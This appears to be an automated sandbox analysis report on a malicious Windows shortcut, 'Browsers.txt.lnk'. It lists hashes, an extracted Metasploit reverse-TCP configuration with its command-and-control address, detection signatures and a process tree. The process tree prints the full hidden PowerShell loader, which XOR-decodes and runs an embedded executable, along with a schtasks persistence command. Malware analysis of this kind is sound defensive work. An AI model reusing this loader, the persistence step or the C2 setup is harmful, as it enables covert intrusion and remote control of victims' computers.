Analysis
-
max time kernel
142s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
06-06-2024 16:04
Static task
static1
Behavioral task
behavioral1
Sample
Browsers.txt.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
Browsers.txt.lnk
Resource
win11-20240426-en
General
-
Target
Browsers.txt.lnk
-
Size
1.1MB
-
MD5
f633c0331190af42493e0bd861853bbe
-
SHA1
e51a46951bb42d8ea12e6d86c075d30c9b95b160
-
SHA256
273a75ba90251e317ed6291e6d4e31f80ce006e81bdc6582a4988078dc5610ef
-
SHA512
35a59bd65dfb15f7412904cc41f1d2eae39e5d15ce9963ff9251584d9b642060dcdf6c3b74f9ba358922d2a0b0baa04887697f4ed8e48bfeb7b2fe98e9861cc9
-
SSDEEP
24576:BqdCjhtTdvhtTdvhtTdvhtTdvhtTdvhr8k:7htTdvhtTdvhtTdvhtTdvhtTdvhQk
Malware Config
Extracted
metasploit
encoder/shikata_ga_nai
Extracted
metasploit
windows/reverse_tcp
104.248.194.233:443
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exetmp1754007103.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation tmp1754007103.exe -
Executes dropped EXE 2 IoCs
Processes:
tmp1754007103.exezntpxyce.dup.exepid process 2532 tmp1754007103.exe 1796 zntpxyce.dup.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\zntpxyce.dup.exe upx behavioral1/memory/1796-41-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/1796-44-0x0000000000400000-0x0000000000419000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3880 powershell.exe 3880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exetmp1754007103.exedescription pid process Token: SeDebugPrivilege 3880 powershell.exe Token: SeDebugPrivilege 2532 tmp1754007103.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.execmd.exepowershell.exetmp1754007103.exedescription pid process target process PID 3176 wrote to memory of 3980 3176 cmd.exe cmd.exe PID 3176 wrote to memory of 3980 3176 cmd.exe cmd.exe PID 3980 wrote to memory of 3880 3980 cmd.exe powershell.exe PID 3980 wrote to memory of 3880 3980 cmd.exe powershell.exe PID 3880 wrote to memory of 2532 3880 powershell.exe tmp1754007103.exe PID 3880 wrote to memory of 2532 3880 powershell.exe tmp1754007103.exe PID 2532 wrote to memory of 2240 2532 tmp1754007103.exe schtasks.exe PID 2532 wrote to memory of 2240 2532 tmp1754007103.exe schtasks.exe PID 2532 wrote to memory of 3340 2532 tmp1754007103.exe schtasks.exe PID 2532 wrote to memory of 3340 2532 tmp1754007103.exe schtasks.exe PID 2532 wrote to memory of 1796 2532 tmp1754007103.exe zntpxyce.dup.exe PID 2532 wrote to memory of 1796 2532 tmp1754007103.exe zntpxyce.dup.exe PID 2532 wrote to memory of 1796 2532 tmp1754007103.exe zntpxyce.dup.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Browsers.txt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 0x00117926} ^| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x33 }; $path = 'C:\Users\Admin\AppData\Local\Temp\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file ^| select -Skip 002838)) -Encoding Byte; ^& $path;2⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x00117926} | Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x33 }; $path = 'C:\Users\Admin\AppData\Local\Temp\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file | select -Skip 002838)) -Encoding Byte; & $path;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\tmp1754007103.exe"C:\Users\Admin\AppData\Local\Temp\tmp1754007103.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN WinTask5⤵PID:2240
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\Admin\AppData\Local\Temp\tmp1754007103.exe /sc minute /mo 55⤵
- Creates scheduled task(s)
PID:3340 -
C:\Users\Admin\AppData\Local\Temp\zntpxyce.dup.exe"C:\Users\Admin\AppData\Local\Temp\zntpxyce.dup.exe"5⤵
- Executes dropped EXE
PID:1796
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3696 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:81⤵PID:3004
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD57889c4df19a5f4e678965812cdde1deb
SHA1fbc034bae5de5bde878b364134a73d12cc3b47f5
SHA2564cf48c2a3933ac4c6733533bf16d40fa4e411fbbf42b03d84d6c8df62e253ad0
SHA5128642097d70fcd4dd46eda2ced82c3727ca4b27c19fc803568347cc4828e65bfce5aa4fc94b8fcf5d1b1aa21bfeecd865883c8be1b3717d7d76d82b838c836401
-
Filesize
47KB
MD5090de6108919fa287445dcc327750a88
SHA1c9edd286ffa8533ed76b4efa464753a1649f95b0
SHA2564edf2a61c1a4af58990fe72a746d9b810cd173ddb40baf56231a580095b6c252
SHA5124a89033e1fa619328fb5eb3a39a027d32061c96f1205240bc73d5ed6d6ad27e5e22cdf718855a476a6171c63e8b9e1b797a84fdcc30b38e2ac7c66a860ba75ca